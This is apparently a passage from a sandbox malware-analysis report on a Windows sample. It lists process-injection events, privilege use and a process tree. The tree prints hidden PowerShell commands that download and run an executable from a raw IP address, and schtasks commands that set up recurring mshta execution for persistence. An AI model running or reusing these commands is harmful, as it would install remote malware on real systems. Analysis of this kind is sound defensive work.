N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2736 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2736 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2264 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
PID 2264 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
PID 2264 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 2264 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 4600 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 2264 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 2264 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 2264 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 2264 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 2264 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 2264 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 3336 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3336 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3336 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3068 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 3068 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 3068 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 2264 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 2264 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 2264 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 2264 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 2264 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 2264 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 552 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 552 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 552 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 3536 wrote to memory of 4052 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe
PID 3536 wrote to memory of 4052 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe
PID 2264 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe
PID 2264 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe
PID 2264 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe
PID 3636 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\mshta.exe
PID 3636 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\mshta.exe
PID 3636 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\mshta.exe
PID 2528 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2528 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2528 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3824 wrote to memory of 2900 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 2900 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 2900 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2264 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4052 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 4052 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 3332 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 3332 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 4052 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18364.exe
PID 4052 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18364.exe
PID 4052 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18364.exe
PID 3640 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3640 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3640 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3244 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 3244 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 4596 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 4596 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 3640 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe

"C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\nsrxg\xjed.exe

C:\ProgramData\nsrxg\xjed.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe

C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe

C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn qu8aHmaHHTR /tr "mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn qu8aHmaHHTR /tr "mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'S64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Users\Admin\AppData\Local\Temp\temp_18344.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18344.exe"

C:\Users\Admin\AppData\Local\Temp\temp_18344.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18344.exe"

C:\Users\Admin\AppData\Local\Temp\temp_18364.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18364.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"

C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE

"C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE"

C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"

C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4968 -ip 4968

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "wdknzmaySHV" /tr "mshta \"C:\Temp\ChUfktwuK.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ChUfktwuK.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

